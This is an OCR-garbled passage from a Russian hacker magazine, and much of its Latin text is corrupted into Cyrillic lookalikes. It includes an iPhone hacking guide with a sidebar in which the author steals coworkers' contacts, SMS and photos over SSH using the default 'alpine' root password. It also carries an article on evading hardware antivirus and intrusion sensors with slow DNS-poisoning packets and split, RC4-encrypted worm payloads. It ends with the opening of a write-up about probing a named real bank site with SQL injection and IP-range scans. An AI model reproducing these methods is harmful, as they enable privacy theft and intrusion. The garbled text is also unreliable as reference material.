сот. арріе . зргіпдЪоагсІ.рІізк (после конвертации в 
ХМ Б) содержится подобный КЛЮЧ: 

<кеу>гіпдкопе</кеу> 

<зкгіпд>зузкет : Мокогсусіес/ зкгіпд> 

Эта настройка определяет общую мелодиюзвонка. Значение 
в <5ігіпд></5Ігіпд> может быть одним из следующих: 

1) &1Е;бе^аи11:&д1:; (рингтон поумолчанию, называется 
МагітЬа); 

2) зузЕеш: название рингтона (рингтон из поста вляемыхссис- 
темой, они содержатся в папке /ЬіЬгагу/ЕіпдДопез; при- 
веденный выше рингтон — это файл /ЬіЪгагу/Кіпдкопез/ 
Мокогсусіе .ш4а); 

3) іЕипезщифро-буквенный код (залитый пользо- 
вателем рингтон, содержащийся в /ѵаг/шоЬіІе/ 
Месііа/ іТипез_Сопкго1 /Кіпдкопез ; код здесь не 
имя файла, а идентификатор из какой-то базы данных). 
Изменив этот ключ, ты сможешь изменить используемый 



рингтон. Самый надежный способ — заменить все системные 
рингтоны своим (контейнер — МРЕѲ-4, кодек — ААС, длитель- 
ность — не больше40 секунд, расширение — .ш4г). 

Чтобы изменитьзначение ключа гіпдіопе, либо сконвертируй 
сот. арріе . зргіпдЪоагсі.рІізк в текст, измени его вруч- 
ную и сохрани, либо, используя утилиту Эрики, отдай команду: 

ріикіі -з гіпдкопе -ѵ " зузкет: Зопаг " /ѵаг/ 
тоЪіІе/ЬіЪгагу/РгеІегепсез/сот. арріе . 
зргіпдЬоагсі . ріізк 

Потомуже принципу можно изменитьлюбые настройки мобильной 
05Х. За год существования ІРЬопе они были прекраснодокументи- 
рованы.ато, что ты не найдешь в Ооодіе, за тебя найдетдгер. 

В 50ЫТЕ 

Наконец, в маленькихуютненьких базочкахЗОБЬе хранятся 
замечательные вещи — база 5М5, адресная книжка и многое 
другое. База 5М5 лежиттут — /ѵаг/тоЫІе/ЫЬгагу/ 
ЗМЗ/зтз . сІЪ, адресная книга тут — /ѵаг/шоЫІе/ 
ЫЬгагу/АсісІгеззВоок.вдІііесІЬ. Скопировав их на свою 
машину, ты сможешь разобраться в структуре и содержимом с 
помощьюутилиты вцЫеЗ (у пользователей Мае 05Хона есть 
сразу, у пользователей Біпих и ѴѴІпсІоѵѵв тоже не будет особых 
проблем). 

Утилита может выполнять твои желания интерактивно или 
прямо из командной строки. Еслиты вызовешь ее с 50Б-за- 
просом, она исполнитего и выйдет. Если без — она вернеттебе 
приглашение и будет ждать других запросов и команд. Самые 
интересныетаблицы —таблица шеззадезв зшз . сіЬ и табли- 



Меняем пароль 
на ІРЬопе 

Если подопытный ІРЬопе принадлежит тебе, защитить 
его очень просто — просто поменяй пароль гооЕ Но если 
ты еще не обновился до второй версии прошивки — не 
стоит при этом использовать раззті. Этим ты испортишь 
/ещ/тазіюг.раззті. Хоть 05 X и не требуется пароль гооЦ 
ей нужно прочитать при старте список пользователей. 
Телефон не сможет загрузиться и тебе придется восста- 
навливать его прошивку. Поменяй пароль вручную. Для 
этого нужно посчитать хеш нового пароля командой 
орепззі раззшеі -сгурі -заЬ /б твой_новый_пароль и заме- 
нить хэш пароля пользователя гооі: в /егс/тазгег.раззті. 
Если ты — конченый параноик, поставь заодно ВоББРгебз 
и отключай ббЬсі, когда он тебе не нужен. 
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ца АВРегзоп в АсИгеззВоок . здІікесІЪ. Ты можешь читать, парсить 
и изменять эти базы, более того — Эрика и ее портировала на ІРИопе (к 
вопросу о силе ореп зоигсе). Не забудь сделать резервную копиюдля себя 

— мало ли для чего может пригодиться база чужих 5 М5 и адресная книга с 
работающимителефонами и электронными адресами. 

И, конечно, используй зцІііеЗ в целях мира во всем мире: 

здІікеЗ зтз.йЪ "Ш5ЕКТ ШГО теззадез ѴАШЕЗ(0, 

' +0000000 ' , 1354321900, ' МЫ ЛЮДИ БУДУЩЕГО НЕ ЗАПУСКАЙТЕ 
КОЛЛАЙДЕР НЕ ЗАПУСКАЙТЕ КОЛЛАЙДЕР ’ , 1 , 0 , ШЬЬ , 0 , 0 , 0 , 0 , 0 ) 

Пускай человек внезапно обнаружит в своей базе послание из будущего (1 
декабря 2012 года в 00:31 :40 по Гринвичу — третье поле втаблице содержит 
дату в эпохе). 

Н АТ+0МР6! 

Это же телефон, черт возьми! Музыка музыкой, картинки картинками, но 
главная задача сотового телефона — сотовая связь. Вообще, модем в 
сотовом телефоне (в ІРИопе это /сІеѵ/ССу . ЬазеЬапй) обычно недоступен 

— на нем висит коммуникационный процесс, ожидающий поступления 
звонков и сообщений. Ноу нас есть лазейка — /сІеѵ/ССу . сІеЬид. 

Чтобы поговорить с модемом, можно использоватьтіпсош(он часть пакета 
с ВЭй-окружением). Его потребуется настроить (тіпісош -з],так как по 
умолчанию он пытается соединиться с /сЗеѵ/шосІеш. Но еслиты торопишь- 
ся, создай симл инк— 1п /сіеѵ/кку . ЪазеЪапсі /йеѵ/тосіет (симл инки 
на телефоне — это очень круто). 

Теперьзапусти тіпісош и начинай отдавать АТ- команды. Кпримеру, 
команда АТ+СВС, сообщиттебе обуровнезаряда батарейки: 

АТ+СВС 
+СВС : 0,65 
ОК 

Батарейка заряжена на 65%, и еще на какое-то время ее хватит. Теперь мож- 
но позвонить, отправить зтз или подключить какую-нибудь хорошую услугу. 
Давай отправим згшб — это меньшее, что мы можем сделать послетого, как 
прочитали все имеющиеся. 

АТ+СМ6Р=1 // Модем переключается втекстовый режим (0 — голос, 1 

— текст) и возвращает О К. 

“АТ+СМ6ѴѴ=“+71 2345678“// Здесь начинается, собственно, сообщение. 
Номерабонента — часть команды. Модем вернет приглашение ввести текст 
сообщения. 

> ѴѴеІсоте...1о1ЬеѵѵогІсі оЙотоггоѵѵ!// Сообщение кончится, когда модем 
получитЕОР — теперьоно будетзаписано в память. Модем вернетОКи 
+СМѲѴѴ: N. где N — индекс сообщения в памяти модема. 

АТ+СМ55=І\І// Отправка сообщения, индекс которого — N. вернетОК, если 
сообщениеуспешно отправлено. 

СписокАТ-команд не менялся уже много лет. Используя их, ты сможешьот- 
правлятьЭМЭ, набиратьтелефонные номера и изучать свойства аппаратной 
части ІРИопе. 

Для того чтобы отдавать АТ-команды прямо из командной строки, было на- 
писано несколько утилит. Например, команда ІРИопе Еіііе выпустила утилиту 
зепсітосіет. Протолкнув зепсітосіет на ІРИопе, ты сможешь использовать 
ее саму по себе или в скриптах. Исходный код утилиты — прекрасный при- 
мертого, как отдавать АТ-команды программно. 

Н ПЕРСПЕКТИВЫ 

Как видишь, даже без особой подготовки можно найти и поюзать ІРИопе, 
получив при этом огромное удовольствие. Аеслиты подготовишься, то 
сможешь сделать куда больше. 

Писать для ІРИопе не сложнее, чем для любой другой II N IX 05 и значи- 
тельно проще, чем для любого другого сотового телефона. Бесполезно 
помещать на ІРИопе Заѵа-утилитки — емутребуется суровый мужской С. 
Несмотря на возражения Арріе, за год вокругіРИопе сложилось огромное 



§ог1 хулиганит 

Так уж вышло, что в офисе нашей редакции очень много айфонов. И 
если ты вдруг появишься с Кокіа (а я большой поклонник N95, хоть и 
переквалифицировался на Арріе), то на тебя будут очень сочувствен- 
но и активно смотреть, мол, ничего, бонус получишь и тоже обайфо- 
нишься. 

Движимый благородными чувствами, я решил поломать все имею- 
щиеся в области досягаемости нашей ѵѵШ-сети яблочные телефоны, 
чтобы их владельцы не так сильно смущали нормальных людей. 
Логика, конечно, слабенькая, но допустимая. Хоть мака у меня под 
руками и не было, больших сложностей после прочтения статьи у меня 
не возникло. 

Скачал для своего домашнего питона модуль руЬогцоиг (Ъар://о25. 
сзаі1.тіЦеби/о2з-\уікі/руЪопюиг) . который позволяет в реальном 
времени следить за гегосопі-совместимыми сервисами. 
Подредактировал скрипт Ъгоѵѵзе_апсІ_ге 80 Іѵе.ру из комплекта модуля 
так, чтобы он обнаруживал только ззй-сервисы: зу з . агдѵ [ 1 ] заме- 
нил на ' _з зЬ . _Ьср ' — и никаких тебе аргументов запуска. 

Потом в саІІЪаск-функции добавил, чтобы для каждого ЬозШате запус- 
кался тред с рзср.ехе (из комплекта Рину) н скачивал список контак- 
тов, смс и все фотографии (% з — это хост айфона) . 

Параметры запуска для контактов: 

рзср.ехе -г -рот аіріпе гооВ@%з : /ѵаг/шоЬіІе/ЬіЬгагу/ 
АсІсІгеззВоок/АсІсІгеззВоок . здІікесІЪ X : Хіркопез . с!Ъ\%з\ 

Дляфоткок: 

рзср.ехе -г -рот аіріпе гооВ@%з : /ѵаг/тоЪіІе /тесНа/ 
БСІМ X: \ірЬ.опез . (ЭЪ\%з\ 

Для базы 5М5: 

рзср.ехе -г -рот аіріпе гооВ@%з : /ѵаг/тоЬіІе/ЬіЬгагу/ 
ЗМЗ/зтз . сЗЬ X: \ірІаопез . с!Ъ\%з\ 

Также потребовалась копия этих команд для старых прошивок: все то 
же самое, только ' гоок ' вместо ' шоЬіІе ' . 

После запуска скрипта чужая приватная инфа не заставила себя ждать. 
Однако если с просмотром фоток все понятно (]р е § — он и на айфоне 
)ре§), то, чтобы прочесть смс и адресную книгу, пришлось скачать спе- 
циальную утилитку для работы с базами зцШе (Титр: //здІДеЪгоѵѵзег. 
зоигсеіог^е.пеО . 

Вывести с ее помощью все контакты из файла АсІсІгеззВоок.здІЦесІЪ 
помог простенький запрос: 

ЗЕЬЕСТ АВРегзоп . Ьазк , АВРегзоп . Еігзк , АВМиІкіѴаІие . 
ѵаіие ЕКОМ АВРегзоп , АВМиІкіѴаІие 
ШНЕКЕ АВРегзоп . КОШІБ = АВМиІкіѴаІие . гесогс!_іс1 
О КОЕК ВУ АВРегзоп . ЬазР 

Чтобы не побили, хожу теперь по офису и делаю всем раззті. 



девелоперское сообщество, и ты легко найдешь подробные инструкции по 
кросс-компиляции, мануалы и описания библиотек, узнаешь — как бороть- 
ся с зіапсібу тобе, перехватыватьуправление модемом итакдалее. 
Представь себе маленькую утилитку, обнаруживающую другие телефоны 
по Вощоиг, логиняющуюся по ззЬ с паролем аіріпе и оставляющую на них 
свою копию. Или утилитку, отправляющую згшз (с вежливым приветс- 
твием всем людям в адресной книге — можно было бы обойтись 10-15 
строчками кода). В общем, ІРИопе — действительно революционное 
устройство. НЕ 
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КРИС КАСПЕРСКИІ 



СЕРЫЕ КАРДИНАЛЫ 
МАГИСТРАЛЬНЫХ 
КАНАЛОВ 
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ІПримем как факт: ни д омашние, ни корпоративные п ольз о ватели не обнов-| 

г і ■ рпі'ми 1 

гяются и обновляться не будут. Никто не хочет вкладывать деньги в систе-Г 
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се тогда г лобальные эпидемии больше не возни кают? Что мешает червям | 

Ісвооод но распространяться от машины к машине?^ 

М“ у/ Ѣ 



гы защиты и держать целый штат специалистов по безопасности. Почед^ 



Н МРАК СЕКРЕТНОСТИ 

Оказывается, помимо КАѴ’а, ОгѴѴеЬ’а, ІМОСа (техника обхода которых пос- 
тоянно обсуждается на хакерских форумах) существуютеще и аппаратные 
антивирусы, встроенные в железки от С 1 8 С 0 , ОиЫК’а и прочих производи- 
телей. Особенности реализации сами по себе не делаютаппаратный анти- 
вирус крутым и могущественным. В них нетничего загадочного, таинствен- 
ного или сверхъестественного — эвристика, сигнатурный поиски прочие 
классическиетехники каменного века. Почемуже тогда аппаратные анти- 
вирусы работают, а программныетормозятсо страшной силой (попробовали 
бы онитактормозить на магистральных каналах!), но ничего не ловят? 

А все потому, что сигнатуры аппаратных антивирусов описывают не 
конкретный экземпляр малвари, а сценарий атаки, эксплуатирующей ту 
или иную уязвимость. Сигнатуры берутся у независимых поставщиков 
(крупнейшим из которых является ЕпсІеаѵогЗесигНу Іпс), а не собираются 
каждым производителем индивидуально. Распределенные сенсорные сети 
(они же «гриды», отанглийского «вепвогдгіб») детектят всякую аномаль- 



ную активность, фиксируютхакерские атаки, эксплуатирующие еще не 
известные дыры, которыетутже описываются разработчиками антивируса 
на языке регулярных выражений и отправляются в базу. Разумеется, на это 
требуется время. И довольно значительное, поскольку дизассемблирова- 
ние малвари/шеллкода приходится выполнять вручную, а специалистов по 
реверсингу не хватает. 

Почемуже тогда при всех своих недостатках аппаратные антивирусы 
оказались настолько эффективны, что прищемили всех червей, хакеров 
и установили в Сети круглосуточный комендантский час? Причина втом, 
что большинство атакующих даже не подозреваюто существовании 
«серых кардиналов» и потому никак от них не защищаются. Да и как 
защищаться, если принципы работы аппаратныхантивирусов неизвестны, 
а сам антивирус доступен лишь сотрудникам крупных ІТ-компаний, среди 
которых хакеры встречаются намного реже, чем крокодилы в Сахаре. Атем, 
что встречаются, никто не позволит вскрывать коробку ценой в несколько 
тысяч долларов! 



► 058 
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ІБлок-схема распределенной сети раннего предупрежде- 
ния и предотвращения атакД 



|Шестеренки, приводящиеантивирус в движение| 



Аппаратные антивирусы окутаны плотным мраком секретности. Даже 
доступ к сигнатурным базам лицензируется на весьма жестких услови- 
ях. Подписка о неразглашении, работа только с юридическими лицами 

— вот и все хакерство! Информацию приходится собирать буквально 
по крупицам. Но всеже, есть добрые люди, имеющие доступ к коробке 
и сотрудничающие с лидерами отрасли. Они очень хорошо знают все 
зубчатые шестеренки и рычаги управления, приводящие в движение 
грандиозный механизм быстрого реагирования, стоящий на страже 
интернета. 

В ВНУТРИ КОРОБКИ 

Аппаратный антивирус представляет собой гибрид системы обнаружения 
вторжений с пакетным сканером, работающим на определенном сетевом 
уровне и опирающимся на более или менее развитый сигнатурный «дви- 
жок». Простейшие антивирусы, встраиваемые в дешевое оборудование, 
работа ют л ибо на ЕіЬегпеі, либо на ІР уровне. 

Потоковый анализ ТСР-пакетов — это уже совсем другой ценовой класс, 
поскольку парсингТСР-пакетов весьма ресурсоемкое дело. Особенно, если 
атакующий умышленно посылает ІР-пакеты в обратном порядке, то есть па- 
кет, находящийся в конце ТСР-сегмента, идет первым, и, чтобы применить 
сигнатуру, антивирус должен созвать полную ассамблею. Другими словами 

— собрать весьТСР-сегмент, откладывая пакеты в память, которая, между 
прочим, не резиновая. Азлоумышленник (вот гад) шлетпакеты с предельно 
низкой скоростью, такой, чтобы его только не отрубило по тайм-ауту. Да и 
неон один. Лишь в исключительных случаях пакеты следуют в том порядке, 
в котором они отправлялись. На перекрестках интернета они многократно 
перемешиваются с другими, переупорядочиваются, кое-что теряется по 
дороге... А куда антивирусу деваться? Приходится складировать пакеты в 
память и ждать прихода всего сегмента целиком или же расширять базу 
сигнатур, доводя ее до состояния, при котором атака однозначно идентифи- 
цируется по любому фрагментуТСР-пакета, что опять-таки требует памяти 

— сигнатуры нужно где-то хранить. 

Антивирусы первых поколений использовали фиксированные последо- 
вательности байт, иногда «привязанные» копределеннойточке — сме- 
щению от начала пакета или другой структуры. Затем появились подста- 
новочные символы «*» и «?» (известные еще со времен М5-005). За ними 
пришли регулярные выражения типа РЕ6ЕХ/РРСЕ (впрочем, продвинутые 
антивирусы поддерживают сразу оба стандарта). Разбор регулярных 
выражений требуетзначительных вычислительных мощностей, ктомуже 

— регулярные выражения в общем случае невозможно откомпилировать 



(во всяком случае, эффективно). Хуже того, они обладают существенными 
ограничениями, не позволяющими распознавать полиморфный код. В 
обычных программных антивирусах для него пишутся специальные модули, 
использующие самые невероятные алгоритмы — от простого подсчета 
энтропии до натягивая ветвлений на графы с переименованием регистров 
и ячеек памяти в псевдопеременные. 

Крутые полиморфные вирусы распознаются с болышимтрудом и огромным 
количеством ложных срабатываний (и это — с учетом специально зато- 
ченных под них модулей детекции). Регулярные выражения здесь вообще 
отдыхают. Все, что могут разработчики — это создать сигнатурную базу, пе- 
речисляющую все возможные варианты следования байт в мутированном 
вирусе. Несколько тысяч регулярных выражений на один полиморфный 
вирус — явление вполне нормальное, хотя хреново работающее. Вручную 
набить (и отладить) столько регулярных выражений — нереально, а потому 
процесс их создания полностью автоматизирован. Отсюда и качество 
детекции (вернее, его отсутствие). В среднем, таким путем распознается 
от 75% до 95% штаммов, когда КАѴ и Ог.ѴѴеЬ ловят до 99,6% (уровень в 98% 

— для нихуже катастрофа и явный лагдетектора, который устраняется, как 
только поднимается крик«Почему ваш антивирус ничего не ловит?»). 
Ограничения регулярных выражений приходится компенсировать допол- 
нительными средствами. В частности, пороговыми датчиками (іЬгезЬоІсі 
зепзог/сіеіесіог). Что это значит? Допустим, мы имеем сигнатуру, описыва- 
ющую последовательность КІОР’ов, за которой идет ЦМР ЕЗР (классический 
сценарий передачи управления на зЬеІІ-код при стековом переполнении). 
Может л и такая последовательность встретиться в «честном» потоке дан- 
ных? Может, почему бы и нет. ЫОР’ы — очень распространенное явление, а 
ЦМР Е8Р представляет собой двухбайтовую команду и потому вероятность 
ложных позитивных срабатываний весьма велика. Чтобы интернет не 
погрузился в пучину репрессий, уантивируса имеется определенный порог, 
ниже которого атака не фиксируется. И хотя грамотно написанному збеіі- 
кодудля захвата управления достаточно послать всего один пакет (в идеа- 
ле), аппаратные антивирусы целенаправленными атаками не интересуются 
и просыпаются лишьтогда, когда в Сети появляется червь или злобный 
хакер, забрасывающий збеіі-код на всеузлы без разбора. 

Выходит, что аппаратные антивирусы годятся лишь для предотвращения 
глобальныхэпидемий? Не совсем. Ряд атакоднозначно описывается 
языком регулярных выражений. К примеру, если мы имеем ошибку пере- 
полнения в графической библиотеке ІЕ, неправильно обрабатывающего 
теги діМфайлов, на прикладном уровне атака однозначно идентифициру- 
ется парсингом д ^-заголовков. Но до прикладного уровня еще дотянуться 
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Интернет после очередной эпидемии червей 

надо!Хорошо, если долежит на ѴѴЕВ-сервере «какой есть». Ачто, если 
его послали мылом в одной из многочисленных кодировок, которую только 
поддерживают почтовые клиенты, да еще вупакованном виде? Ни один 
антивирус, работающий на сетевом уровне, его не распарсит (правда, 
почтовые антивирусы справляются стакой ситуацией без труда). Некоторые 
производители в борьбе за рейтинги пытаются парсить прикладные прото- 



Стандарты 

регулярных 

выражений 

КЕСЕХ в широком смысле этого слова означает все регулярные 
выражения (Ке^иіаг Ехргеззіопз), но в определенном контексте ас- 
социируется с библиотекой «КЕСЕХ», написанной Генри Спенсером 
(Непгу Зрепсег) . Ее синтаксис перекочевал во многие скриптовые 
языки (Регі, Тсі и т.д.), подробнее о которых можно прочитать на 
Вике: еп.ѵуікіребіа.огу/ѵПкі/КеуиІаг ехргеззіоп . Двигаясь ходом 
эволюционного развития, регулярные выражения образовали биб- 
лиотеку РКСЕ, что расшифровывается как Регі СотрагіЫе Ке^иіаг 
Ехргеззіопз — Регі-совместимые регулярные выражения, постепен- 
но ставшие стандартом де-факто. Практический пример примене- 
ния приведен ниже: 

/\™+?\з\™+?\ ( ( [\ѵЛз=3 + ,* I [\ѵЛв=] + Ц?Ю ) *\) |/ 

Естественно, помимо КЕСЕХ/РКСЕ существуют и другие библиотеки. 
Ряд антивирусов использует свои собственные, ни с чем не совмес- 
тимые «стандарты», и потому поставщикам сигнатур приходится не 
по-детски извращаться, чтобы удовлетворить изыски разработчиков 
защитных механизмов. 



колы с сетевого уровня, формально поддерживая сигнатуры, описывающие 
заданный тип атак, однако, их очень легко обломать (конечно, если знать об 
их существовании и в идеале имея доступ к базе сигнатур). 

В КАК ЭТО ЛОМАЮТ 

Рассмотрим основные (можно даже сказать, фундаментальные) механизмы 
обхода аппаратных антивирусов, широко обсуждаемые в закрытых кругах и 
уже вырвавшиеся на свободу в виде весьма агрессивных вторжений в чу- 
жие системы. Держать информацию под колпаком больше не имеетсмысла. 
Если кто от этого и выиграет — тактолько вандалы, нападающие на ничего 
не ведающих пользователей. Пользователи должны быть предупреждены! 
Короче, покажем, какобхитритьІЬгезЬоІсі зепзог на примере«отравления» 
0Ы5-сервера поддельными пакетами. МісгозоЙ выпускаетуже четвер- 
тую по счету заплатку, затрудняющую атаку, но отнюдь не делающую ее 
невозможной. До недавнего времени номер порта отправителя ІЮР-па- 
кета с РЫЗ-запросом и 1 6-битный номер последовательности Тгапзасііоп 
Ю (ТХЮ) были легко предсказуемыми. Хакеры без труда генерировали 
подложные ОЫЗ-ответы, воспринимаемые системой как правильные. В 
результате, жертву удавалось заманить на совершенно посторонний узел, 
которомуона сообщала конфиденциальные данные (отномера кредитки до 
пароля на почтовый ящик). 

В начале июля 2008 года МісгозоЙ выпустила патч М508-037, радикально 
меняющий стратегию назначения локальных портов. Если раньше номер 
порта каждого отправляемого пакета тупоувеличивался на единицу, то 
теперь используется — даже не гапсі ( ) , а довольно серьезная криптогра- 
фическая функция, генерирующая «очень случайные» 1 6 бит. Настолько 
случайные и непредсказуемые, насколько это возможно! Хотя, вообще-то, 
на трезвую голову хватило бы и гапсі ( ) , но Місгозой не ищет простых 
путей :). Предыдущий патч (М508-020) исправлял вполне предсказуемый 
ТХЮ, основанный на простой временной функции, которая, однако, была 
предсказуема только в лабораторныхусловиях. До промышленныххакер- 
ских стандартов она явно недотягивала, но специалисты по безопасности 
написали кучуумных статей с серьезными математическими выкладка- 
ми (надо же как-то отрабатывать гранты). Обиженная до глубины души 
МісгозоЙ разозлилась настолько, что всобачила криптостойкую функцию 
СгурОСепКапсІот ( ) в сіпзарі . <3.1 1 , живописно описав все ее преиму- 
щества на своем же блоге Ыодз.ІесЬпеІ.сот/зѵѵі/а гсЫѵе/2008/04/09/тз08- 
020-боѵѵ-рге гіісіаЫе-іг-іЬе-сІпз-ігапзасііоп-ісІ.азрх . И кстати, дипломатич- 
но «забыв» упомянуть, что если вызов СгурДСепЕапЗош ( ) провалится, то 
вызывается обычный гапсі ( ) . 

Так что, теперь сплошной абзац (Последнее слово отредактировано, 

— Прим. ЕогЬ). Оба поля совершенно случайны и абсолютно непредска- 
зуемы. Во всяком случае, на первый взгляд. Аесли копнуть вглубь? Не 
дизассемблером и не отладчиком, а просто — головой? По умолчанию, 
пропатченный драйвер ТСРІР . ЗУЗ использует ограниченный набор 
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портов (49152-65535), что в пересчете на хакерскую валюту дает нам 20 бит 
(точнее, 19 с хвостиком, но хвостик мы округляем в большую сторону). Плюс 
16-битное полеТХЮ. Итого мы имеем 20 бит. Следовательно, для успешной 
атаки хакеру необходимо, в среднем, послать 2 л 20/2 = 524.288 подложных 
пакетов. Да это же настоящий шторм, который распознаетлюбая Ю5! У нее 
все датчики зашкалят! 

Стоп! А куда нам спешить? Сядем, покурим, а пока курим, будем посы- 
лать пакеты. По одному в минуту. Ведь как устроена ЮЗ? Она садится на 
канал, ловя все пролетающие пакеты. Если с одной стороны появляется 
большое количество йЫЗ-ответов, которые не запрашивались и которые 
имеют совершенно левый номер порта с не менее левым ТХЮ, то вы- 
ставляется флагатаки. Естественно, поскольку левые пакеты сыплются 
и без всякой хакерской помощи (у какого провайдера маршрутизатор 
идеально настроен?), то ЮЗ для предотвращения ложных позитивных 
срабатываний реагирует не на количество левых пакетов вообще, а 
именно на их интенсивность. Один пакет в минуту — это не шторм, а 
вполне нормальное явление даже в мелкой подсети. Конечно, такими 
темпами атака будет длиться в среднем 364 дня, что вполне сопоставимо 
с вечностью, однако, когда атакуется не какая-то конкретная машина, 
ситуация резко меняется. Допустим, у хакера имеется 1 00 потен циаль- 
ных жертв, которым рассылаются пакеты. Как нетрудно рассчитать, 
среднее время атаки сокращается до 3,6 дня. Причем, атакующий может 
свободно менять собственный ІР, ведь ІЮР работает без установки 
соединения, а ловить ответхакеру не нужно. В пересчете на каждый 
используемый ІР интенсивность посылки пакетов находится ниже 
порога чувствительности сенсоров. Вывод: ЮЗ вместе с аппаратными 
антивирусами сидяттихо и не возникают! 

Хорошо, с сенсорами мы разобрались. Займемся сигнатурами. Ихтоже 
несложно одолеть — даже без привлечения полиморфизма. Отбросим 
бесполезную мелочь и сосредоточимся на антивирусах, установленных на 
магистральных каналах, обладающих достаточной мощью для сбора всего 
ТСР-пакета и несущих на своем борту обширные базы оперативно обновля- 
емых сигнатур, бьющие массированную атаку буквально через считанные 
часы (а то и минуты) после ее начала. Существует ли универсальный способ 
обхода заранее неизвестного антивируса? Оказывается, да. И такой, 
которому никакой магистральный антивирус принципиально не может 
противостоять. Прежде чем придумывать убийственный контраргумент, 
вернемся к истокам и вспомним, с чего все начиналось. 

Изначально задумывалось, что интернет — это сеть, которая продолжит 
функционировать даже после начала атомной войны, когда большинство 
узлов разрушено. Сеть, в которой пакеты самостоятельно (ну не совсем 
самостоятельно, конечно) прокладывают себе маршрут. Сеть, в которой 
два фрагмента одного ТСР-пакета из пункта «А» в пункт «В» могут идти 
разными путями. Гм, а ведь на счет путей — это идея! ІР-пакеты, пущенные 
разными маршрутами, окончательно собираются вТСРтолько на целевом 



Два крупнейших независимых поставщика сигнатур — ЕігвЮідЫ и 
ЗоигсеЕіге 

узле. Никакой отдельно взятый магистральный антивирус не в состоянии 
собрать полный ТСР-пакет, поскольку через него физически «прокачивает- 
ся»только небольшая его часть! 

Как реализовать та кую систему на практике? Имея домашний компьютер с 
несколькими сетевыми интерфейсами (АОЗЕ-модемом и сотовым телефо- 
ном сѲРРЗ) нетрудно на писать утилиту, разбивающую исходное послание 
на ІР-пакеты, пускаемые через разные интерфейсы. Но это неинтересно, 
да и смысла нет. С целенаправленными атаками магистральные антиви- 
русы не борются, а если ужертвы (или у ее провайдера) установлен хотя бы 
простенький программный антивирус или брандмауэр, то подобное дроб- 
ление ничем не поможет атакующе му. ТСР-пакет будет собран наузле, где 
установлен программный антивирус/брандмауэр, — илиже все ІР-пакеты 
пройдут через него, и он сможет собрать полный ТСР 

А вот для червей это очень хорошая стратегия. Допустим, червь уже заразил 
два узла, находящиеся в различных подсетях и теперь хочет кинуть свою 
тушку натретий. Посылая пакеты с двух узлов одновременно (не забывая, 
что при этом придется реализовать определенный протокол синхрониза- 
ции, так какТСР работаетсустановкой соединения, маркируя пакеты номе- 
рами последовательности), червь пройдетсквозьаппаратный антивирус 
без всяких преград, даже не заметив, что тут кто-то был! 

Главное — добиться того, чтобы червя нельзя было отождествить по одно- 
му отдельно взятому пакету. Для этого достаточно написатьтривиальный 
криптор, «размазанный» по всем пакетам и шифрующий их содержимое 
произвольным ключом. Очевидно, что, не зная ключа (который мож- 
но получить, только собрав все пакеты воедино), антивирус не сможет 
расшифровать вирусноетело, а, значит, не сможет и отождествить его по 
сигнатурам. Естественно, ХОР с константой палится еще на излете (если 
ключ представляет собой 1 байт, то 256 сигнатур детектят червя по любому 
произвольно взятому ІР-пакету) — ноуже РС4 (реализуемый ничуть не 
сложнее) таким способом не словить, и победа остается за хакером и его 
червями! 

Н ИНТЕРНЕТ — РОРЕѴЕР! 

Интернетнеумретникогда. Глобальные эпидемии в исторической перспек- 
тиве — явление вполне закономерное, можно даже сказать неизбежное. 
Всех нас будет колбасить и плющить, так что не стоит сопротивляться, 
лучше расслабиться и спокойно наблюдатьза гонкой вооружений двух 
противоборствующих сторон — хакеров и создателей защитных механиз- 
мов, дополняющих друг друга какиньиянь, как свет и тьма, как день и ночь, 
какдобро и зло... ИИ 
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ТАМ. ГДЕ VI Р 



НОГА НЕ СТУПАЛ 



РУВАЫО «РІІРІОІІ5АМѲЕІ.» 



В ГОСТЯХУ «ПРИВАТБАНКА» 



Казал^^^^^^^^жных ресурсах все должно работать, как часы, ан нет 
— и на них встречаются непростительные ошибки, которые приводят к 




плачевному исходу. Исходу, заставляющему админов колотиться головой о 
клаву, а хакеров — потешаться над ресурсом. На этот раз под прицел попал 
ргіѵаЛапкѵір.сот.иа. 



ак говорится на сайте, «ПриватБанкѴІР» создан для предо- 
ставления рекомендаций по посещению сети предприятий, 
соответствующих высокому статусу элитных заведений Укра- 
ины и России. Дает право пользования привилегированными 
тарифами при оплате платежными картами ПриватБанка, МоскомПриват- 
Банка и ПриватИнвеста. 

В ПРИСТРЕЛИВАЕМСЯ 

Сайт вы глядит до вольно просто — минимум красок, йавЬ -анимация, 
самоп иен ый движок форума. На первый взгляд придраться не к чему. 
Полазив по ссылкам, я попробовал за юзать различные 50 Б- инъекции 
типа: Ьккр : / /ргіѵакЪапкѵір . сот. иа/іпраде . рЬ.р?рп=11, но 
везде меня ждал облом. Нештатные ситуации обрабатывались нормаль- 
но. Никакого ворнинга не выскочило. Искать досконально, признаюсь, 
было лень. 

Следующий шаг подразумевал обратиться за помощью ксіотаіпзсІЪ. 
Вбил ргіѵакЪапкѵір . сот. иа. Сухой ответ гласил: «О доменов». 

" коипсі 0 сіотаіп епкгуз оп N3 : ргіѵакЪапкѵір . сот. иа" 



Досадно, но переживем. Идем дальше. Я резолвнул ІР-адрес 
ргіѵакЪапкѵір .сот.иа (217. 117. 74. 152), ив голову пришла при- 
вычная мысль проскан ить весь диапазон 217 .117.74.*. Вот результат: 

217.117.74.2 : пзОІ . ргіѵак-опііпе . пек (.ЫЕТ | Ыекъгогк) 
217.117.74.6 : ЪиЪ . ргіѵак-опііпе . пек ( .МЕТ | Ыекмогк) 
217.117.74.18 : таіі . сіиер . есіи ( . ЕБЮ | 113 Есіисакіопаі ) 
217.117.74.34 : кгозз . сіиер . есіи (.ЕБкГ | ИЗ Есіисакіопаі ) 
217.117.74.40 : таіі . кег . сір . иа (ЛОА | Юкгаіпе) 

217.117.74.42 : таіі . ргозкосгесіік . сот (.СОМ | ЮЗ 
Соттегсіаі ) 

217.117.74.43 : таіі . зіаѵ-гедізкг . сір . иа (ЛОА | ЕГкгаіпе) 
217.117.74.65 : Ърк . кохкгок . сір . иа (ЛОА | Юкгаіпе) 
217.117.74.70 : Ьозкіпд . ргіѵак-опііпе . пек (.МЕТ I 
Мекъгогк) 

217.117.74.82 : таіі . 74-82 .ргіѵак-опііпе .пек (.МЕТ | 
Мекъгогк) 

217.117.74.97 : таіі . <±П 2 -рек гоѵка . сір . иа (ЛОА | Юкгаіпе) 
217.117.74.152 : ргіѵакЬапкѵір . сот . иа (ЛОА | Юкгаіпе) 
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Аккаунты админов в открытом виде 



217.117.74.160 : Іѵг . сіпірго . ІхсІиЬ . огд (.ОЕ.С | Ыоп- 
РгоТіС ОгдапігаСіоп) 

